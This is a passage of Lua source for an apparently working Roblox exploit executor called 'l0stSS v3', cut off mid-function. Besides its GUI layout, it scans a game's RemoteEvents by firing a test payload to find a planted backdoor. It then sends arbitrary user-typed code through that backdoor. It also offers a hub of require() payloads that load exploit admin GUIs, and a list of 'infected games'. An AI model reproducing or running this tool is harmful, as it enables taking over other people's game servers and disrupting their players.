G2L["4a"] = Instance.new("UICorner", G2L["47"]);



-- StarterGui.ScreenGui.Frame.Logs.UIStroke
G2L["4b"] = Instance.new("UIStroke", G2L["47"]);
G2L["4b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["4b"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.TextButton
G2L["4c"] = Instance.new("TextButton", G2L["4"]);
G2L["4c"]["TextWrapped"] = true;
G2L["4c"]["BorderSizePixel"] = 0;
G2L["4c"]["TextSize"] = 14;
G2L["4c"]["TextScaled"] = true;
G2L["4c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4c"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4c"]["Size"] = UDim2.new(0, 35, 0, 35);
G2L["4c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4c"]["Text"] = [[RE]];
G2L["4c"]["Position"] = UDim2.new(-0.07434, 0, 0.31757, 0);


-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["4d"] = Instance.new("LocalScript", G2L["4c"]);



-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["4e"] = Instance.new("LocalScript", G2L["4c"]);



-- StarterGui.ScreenGui.Frame.TextButton.UICorner
G2L["4f"] = Instance.new("UICorner", G2L["4c"]);



-- StarterGui.ScreenGui.Frame.TextButton.UIStroke
G2L["50"] = Instance.new("UIStroke", G2L["4c"]);
G2L["50"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Frame
G2L["51"] = Instance.new("Frame", G2L["4"]);
G2L["51"]["BorderSizePixel"] = 0;
G2L["51"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["51"]["Size"] = UDim2.new(0, 558, 0, 316);
G2L["51"]["Position"] = UDim2.new(-0.09113, 0, -0.02365, 0);
G2L["51"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["51"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.Frame.UIStroke
G2L["52"] = Instance.new("UIStroke", G2L["51"]);
G2L["52"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["52"]["Thickness"] = 4;


-- StarterGui.ScreenGui.Frame.GamesFrame
G2L["53"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["53"]["Visible"] = false;
G2L["53"]["Active"] = true;
G2L["53"]["BorderSizePixel"] = 0;
G2L["53"]["CanvasSize"] = UDim2.new(0, 0, 1, 0);
G2L["53"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["53"]["Name"] = [[GamesFrame]];
G2L["53"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["53"]["Size"] = UDim2.new(0, 105, 0, 322);
G2L["53"]["Position"] = UDim2.new(-0.35252, 0, -0.03857, 0);
G2L["53"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["53"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.GamesFrame.UICorner
G2L["54"] = Instance.new("UICorner", G2L["53"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.UIStroke
G2L["55"] = Instance.new("UIStroke", G2L["53"]);
G2L["55"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD1
G2L["56"] = Instance.new("TextButton", G2L["53"]);
G2L["56"]["TextWrapped"] = true;
G2L["56"]["BorderSizePixel"] = 0;
G2L["56"]["TextSize"] = 14;
G2L["56"]["TextScaled"] = true;
G2L["56"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["56"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["56"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["56"]["Size"] = UDim2.new(0, 76, 0, 74);
G2L["56"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["Text"] = [[Backdoor game]];
G2L["56"]["Name"] = [[BD1]];
G2L["56"]["Position"] = UDim2.new(0.12, 0, 0.03086, 0);


-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.LocalScript
G2L["57"] = Instance.new("LocalScript", G2L["56"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.UICorner
G2L["58"] = Instance.new("UICorner", G2L["56"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.UIStroke
G2L["59"] = Instance.new("UIStroke", G2L["56"]);
G2L["59"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.GamesFrame.UIListLayout
G2L["5a"] = Instance.new("UIListLayout", G2L["53"]);
G2L["5a"]["HorizontalAlignment"] = Enum.HorizontalAlignment.Center;
G2L["5a"]["Padding"] = UDim.new(0, 10);
G2L["5a"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD2
G2L["5b"] = Instance.new("TextButton", G2L["53"]);
G2L["5b"]["TextWrapped"] = true;
G2L["5b"]["BorderSizePixel"] = 0;
G2L["5b"]["TextSize"] = 14;
G2L["5b"]["TextScaled"] = true;
G2L["5b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["5b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5b"]["Size"] = UDim2.new(0, 76, 0, 74);
G2L["5b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["Text"] = [[School]];
G2L["5b"]["Name"] = [[BD2]];
G2L["5b"]["Position"] = UDim2.new(0.12, 0, 0.03086, 0);


-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.LocalScript
G2L["5c"] = Instance.new("LocalScript", G2L["5b"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.UICorner
G2L["5d"] = Instance.new("UICorner", G2L["5b"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.UIStroke
G2L["5e"] = Instance.new("UIStroke", G2L["5b"]);
G2L["5e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.UpdateFrame
G2L["5f"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["5f"]["Visible"] = false;
G2L["5f"]["Active"] = true;
G2L["5f"]["BorderSizePixel"] = 0;
G2L["5f"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["5f"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["5f"]["Name"] = [[UpdateFrame]];
G2L["5f"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["5f"]["Size"] = UDim2.new(0, 561, 0, 115);
G2L["5f"]["Position"] = UDim2.new(-0.09832, 0, 1.0473, 0);
G2L["5f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5f"]["ScrollBarThickness"] = 6;


-- StarterGui.ScreenGui.Frame.UpdateFrame.UICorner
G2L["60"] = Instance.new("UICorner", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["5f"]);
G2L["61"]["Thickness"] = 2.5;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["62"] = Instance.new("TextLabel", G2L["5f"]);
G2L["62"]["TextWrapped"] = true;
G2L["62"]["BorderSizePixel"] = 0;
G2L["62"]["TextSize"] = 14;
G2L["62"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["62"]["TextScaled"] = true;
G2L["62"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["62"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["62"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["62"]["BackgroundTransparency"] = 1;
G2L["62"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["62"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["62"]["Text"] = [[3.5.2: Added Infected games tab, easy access to infected games/games with backdoor.]];
G2L["62"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.UIListLayout
G2L["63"] = Instance.new("UIListLayout", G2L["5f"]);
G2L["63"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["64"] = Instance.new("TextLabel", G2L["5f"]);
G2L["64"]["TextWrapped"] = true;
G2L["64"]["BorderSizePixel"] = 0;
G2L["64"]["TextSize"] = 14;
G2L["64"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["64"]["TextScaled"] = true;
G2L["64"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["64"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["64"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["64"]["BackgroundTransparency"] = 1;
G2L["64"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["64"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["64"]["Text"] = [[3.3.6: some UI rewrite, better aesthetics]];
G2L["64"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["65"] = Instance.new("TextLabel", G2L["5f"]);
G2L["65"]["TextWrapped"] = true;
G2L["65"]["BorderSizePixel"] = 0;
G2L["65"]["TextSize"] = 14;
G2L["65"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["65"]["TextScaled"] = true;
G2L["65"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["65"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["BackgroundTransparency"] = 1;
G2L["65"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["65"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["65"]["Text"] = [[3.2.4: added buttons like reset, removed print and fire all RemoteEvents cuz you can just use a RemoteSpy, this is just a serverside.]];
G2L["65"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["66"] = Instance.new("TextLabel", G2L["5f"]);
G2L["66"]["TextWrapped"] = true;
G2L["66"]["BorderSizePixel"] = 0;
G2L["66"]["TextSize"] = 14;
G2L["66"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["66"]["TextScaled"] = true;
G2L["66"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["66"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["66"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["66"]["BackgroundTransparency"] = 1;
G2L["66"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["66"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["66"]["Text"] = [[3.1.2: Replaced Execute, Clear and Inject buttons with icons.]];
G2L["66"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["67"] = Instance.new("TextLabel", G2L["5f"]);
G2L["67"]["TextWrapped"] = true;
G2L["67"]["BorderSizePixel"] = 0;
G2L["67"]["TextSize"] = 14;
G2L["67"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["67"]["TextScaled"] = true;
G2L["67"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["67"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["67"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["67"]["BackgroundTransparency"] = 1;
G2L["67"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["67"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["67"]["Text"] = [[3.0.0: MAJOR UI rewrite, more advanced injection and execution. made injecting faster]];
G2L["67"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["68"] = Instance.new("TextLabel", G2L["5f"]);
G2L["68"]["TextWrapped"] = true;
G2L["68"]["BorderSizePixel"] = 0;
G2L["68"]["TextSize"] = 14;
G2L["68"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["68"]["TextScaled"] = true;
G2L["68"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["68"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["BackgroundTransparency"] = 1;
G2L["68"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["68"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["Text"] = [[2.7.0: added FAR more scripts and requires to the script hub, very useful for server-side exploiting.]];
G2L["68"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["69"] = Instance.new("TextLabel", G2L["5f"]);
G2L["69"]["TextWrapped"] = true;
G2L["69"]["BorderSizePixel"] = 0;
G2L["69"]["TextSize"] = 14;
G2L["69"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["69"]["TextScaled"] = true;
G2L["69"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["69"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["69"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["69"]["BackgroundTransparency"] = 1;
G2L["69"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["69"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["69"]["Text"] = [[2.5.0: made injecting a bit more advanced.]];
G2L["69"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["6a"] = Instance.new("TextLabel", G2L["5f"]);
G2L["6a"]["TextWrapped"] = true;
G2L["6a"]["BorderSizePixel"] = 0;
G2L["6a"]["TextSize"] = 14;
G2L["6a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6a"]["TextScaled"] = true;
G2L["6a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6a"]["BackgroundTransparency"] = 1;
G2L["6a"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["6a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6a"]["Text"] = [[2.2.1: added a section for built-in scripts and requires.]];
G2L["6a"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["6b"] = Instance.new("TextLabel", G2L["5f"]);
G2L["6b"]["TextWrapped"] = true;
G2L["6b"]["BorderSizePixel"] = 0;
G2L["6b"]["TextSize"] = 14;
G2L["6b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6b"]["TextScaled"] = true;
G2L["6b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6b"]["BackgroundTransparency"] = 1;
G2L["6b"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["6b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6b"]["Text"] = [[2.0.0: made a new injector, more advanced backkdoor detection, better textbox and controls.]];
G2L["6b"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["6c"] = Instance.new("TextLabel", G2L["5f"]);
G2L["6c"]["TextWrapped"] = true;
G2L["6c"]["BorderSizePixel"] = 0;
G2L["6c"]["TextSize"] = 14;
G2L["6c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6c"]["TextScaled"] = true;
G2L["6c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6c"]["BackgroundTransparency"] = 1;
G2L["6c"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["6c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6c"]["Text"] = [[1.8.0: added Polaria and c00lgui to the SS as 2 seperate buttons]];
G2L["6c"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["6d"] = Instance.new("TextLabel", G2L["5f"]);
G2L["6d"]["TextWrapped"] = true;
G2L["6d"]["BorderSizePixel"] = 0;
G2L["6d"]["TextSize"] = 14;
G2L["6d"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6d"]["TextScaled"] = true;
G2L["6d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6d"]["BackgroundTransparency"] = 1;
G2L["6d"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["6d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6d"]["Text"] = [[1.4.0: updated injector]];
G2L["6d"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["6e"] = Instance.new("TextLabel", G2L["5f"]);
G2L["6e"]["TextWrapped"] = true;
G2L["6e"]["BorderSizePixel"] = 0;
G2L["6e"]["TextSize"] = 14;
G2L["6e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6e"]["TextScaled"] = true;
G2L["6e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6e"]["BackgroundTransparency"] = 1;
G2L["6e"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["6e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6e"]["Text"] = [[1.0.0: the first version of l0st serverside, which you can still get and use today thru my github, i will hopefully add buttons to load old serverside versions.]];
G2L["6e"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.TextLabel
G2L["6f"] = Instance.new("TextLabel", G2L["4"]);
G2L["6f"]["TextWrapped"] = true;
G2L["6f"]["BorderSizePixel"] = 0;
G2L["6f"]["TextSize"] = 14;
G2L["6f"]["TextScaled"] = true;
G2L["6f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6f"]["BackgroundTransparency"] = 1;
G2L["6f"]["Size"] = UDim2.new(0, 147, 0, 50);
G2L["6f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6f"]["Text"] = [[more advanced scanner lets go]];
G2L["6f"]["Position"] = UDim2.new(0.34532, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.TextLabel.UIStroke
G2L["70"] = Instance.new("UIStroke", G2L["6f"]);
G2L["70"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["70"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.TextLabel.UICorner
G2L["71"] = Instance.new("UICorner", G2L["6f"]);



-- StarterGui.ScreenGui.LocalScript
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local starterGui = game:GetService("StarterGui")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	
	if not textbox or not executeButton or not clearButton or not injectButton then
		warn("Missing GUI components.")
		return
	end
	
	-- 🧪 Inject test payload into RemoteEvents and detect Hint creation
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'local h = Instance.new("Hint") h.Parent = game.Workspace h.Text = "l0stSS v3 | free and fastest serverside available on the planet"'
		local found = false
		
		for _, obj in ipairs(replicatedStorage:GetDescendants()) do
			if obj:IsA("RemoteEvent") then
				-- Clear existing hints first
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "l0stSS v3 | free and fastest serverside available on the planet" then
						h:Destroy()
					end
				end
				
				local success = pcall(function()
					obj:FireServer(testPayload)
				end)
				
				wait(0.5) -- Give server time to respond
				
				-- Check if Hint appeared
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "l0stSS v3 | free and fastest serverside available on the planet" then
						print("✅ Breach confirmed through RemoteEvent:", obj:GetFullName())
						found = true
						
						-- 🔔 Send SetCore notification
						pcall(function()
							starterGui:SetCore("SendNotification", {
								Title = "Backdoor Found",
								Text = "Backdoor found: " .. obj.Name,
								Duration = 5
							})
						end)
						
						break
					end
				end
				
				if found then break end
			end
		end
		
		if not found then
			print("No RemoteEvent is backdoored. Good luck next time, lad!")
		end
	end)
	
	-- 🔥 Execute payload through confirmed RemoteEvent
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" then
			for _, obj in ipairs(replicatedStorage:GetDescendants()) do
				if obj:IsA("RemoteEvent") then
					local success = pcall(function()
						obj:FireServer(payload)
					end)
					if success then
						print("Payload fired through:", obj:GetFullName())
						break
					end
				end
			end
		end
	end)
	
	-- 🧼 Clear textbox
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		print("Textbox wiped clean like grandma cookies")
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.LocalScript
local function C_3()
local script = G2L["3"];
	local Players = game:GetService("Players")
	local StarterGui = game:GetService("StarterGui")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	StarterGui:SetCore("SendNotification", {
		Title = "l0stSS v3 notification",
		Text = "l0stSS v3 by TLK88 (team l0stk1dd88) loaded successfully! welcome to l0stSS V3, " .. username,
		Icon = "rbxassetid://81013369562879", -- TLK88 icon
		Duration = 4
	})
end;
task.spawn(C_3);
-- StarterGui.ScreenGui.Frame.LocalScript
local function C_5()
local script = G2L["5"];
	-- LocalScript inside your Frame
	
	local frame = script.Parent
	local dragging = false
	local dragInput, mousePos, framePos
	
	frame.Active = true
	frame.Selectable = true
	frame.Draggable = false -- we’ll handle it manually
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			mousePos = input.Position
			framePos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement then
			dragInput = input
		end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			local delta = input.Position - mousePos
			frame.Position = UDim2.new(
				framePos.X.Scale,
				framePos.X.Offset + delta.X,
				framePos.Y.Scale,
				framePos.Y.Offset + delta.Y
			)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_b()
local script = G2L["b"];
	local textbox = script.Parent
	
	textbox.ClearTextOnFocus = false
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_c()
local script = G2L["c"];
	local textBox = script.Parent
	
	textBox.ClearTextOnFocus = false
	textBox.MultiLine = true
	textBox.TextWrapped = true
	
	-- Prevent Enter from unfocusing the TextBox
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			textBox:CaptureFocus()
		end
	end)
	
	-- Insert newline when Enter is pressed
	textBox.InputBegan:Connect(function(input, gameProcessed)
		if gameProcessed then return end
		if input.UserInputType == Enum.UserInputType.Keyboard then
			if input.KeyCode == Enum.KeyCode.Return or input.KeyCode == Enum.KeyCode.KeypadEnter then
				local cursorPos = textBox.CursorPosition or #textBox.Text + 1
				local before = string.sub(textBox.Text, 1, cursorPos - 1)
				local after = string.sub(textBox.Text, cursorPos)
				textBox.Text = before .. "\n" .. after
				textBox.CursorPosition = cursorPos + 1
			end
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.TextBox.Completor
local function C_d()
local script = G2L["d"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
	
		-- Only react if one character was added
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
	
			if typedChar == "(" then
				-- Remove the typed "(" and insert "()"
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "()" .. after
				textBox.CursorPosition = #before + 2
	
			elseif typedChar == "\"" then
				-- Remove the typed "\"" and insert "\"\""
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "\"\"" .. after
				textBox.CursorPosition = #before + 2
			end
		end
	
		lastText = textBox.Text
	end)
end;
task.spawn(C_d);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_10()
local script = G2L["10"];
	script.Parent.Font = Enum.Font.FiraMono
end;
task.spawn(C_10);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_11()
local script = G2L["11"];
	local textBox = script.Parent:WaitForChild("TextBox")
	
	local function forceScrollToBottom()
		local textLength = #textBox.Text
		textBox.CursorPosition = textLength + 1
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(forceScrollToBottom)
	forceScrollToBottom()
end;
task.spawn(C_11);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_12()
local script = G2L["12"];
	local textBox = script.Parent:WaitForChild("TextBox")
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		-- Move selection to end to force scroll
		textBox.SelectionStart = #textBox.Text + 1
	end)
end;
task.spawn(C_12);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_14()
local script = G2L["14"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	-- Exploit payloads
	local buttons = {
		c00lgui = 'require(14125553864):Fire("' .. username .. '","c00lkidd")',
		polaria = 'require(123255432303221):Pload("' .. username .. '")',
		hdadmin = 'require(7192763922).load("' .. username .. '")',
		["1xgui"] = 'require(6858594080).KrnKidsSus("' .. username .. '")',
		c00lkidd = 'require(89709417365094).Forsaken("' .. username .. '","c00lkidd")',
		happyhub = 'require(78790302691160):Hload("' .. username .. '")',
		fatgui = 'require(13772265165).TeamFatGUICrackedByLua("' .. username .. '")',
		rc7 = 'require(12350030542).RC7("' .. username .. '")',
		crack = 'require(75026282232818).crack("' .. username .. '")',
	}
	
	-- GUI hierarchy
	local scriptHubFrame = script.Parent
	local mainFrame = scriptHubFrame.Parent
	local textbox = mainFrame:FindFirstChild("TextBox")
	
	-- Safety check
	if not textbox then
		warn("❌ TextBox not found.")
		return
	end
	
	-- Connect each button dynamically for `require` buttons
	for name, code in pairs(buttons) do
		local btn = scriptHubFrame:FindFirstChild(name)
		if btn and btn:IsA("TextButton") then
			btn.MouseButton1Click:Connect(function()
				textbox.Text = code
			end)
		end
	end
	
end;
task.spawn(C_14);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
local function C_15()
local script = G2L["15"];
	local container = script.Parent
	
	for _, obj in pairs(container:GetDescendants()) do
		if obj:IsA("TextButton") then
			local stroke = Instance.new("UIStroke")
			stroke.Thickness = 2
			stroke.Color = Color3.new(0, 0, 0) -- Pure black
			stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
			stroke.Parent = obj
		end
	end
end;
task.spawn(C_15);
-- StarterGui.ScreenGui.Frame.Execute.LocalScript
local function C_21()
local script = G2L["21"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
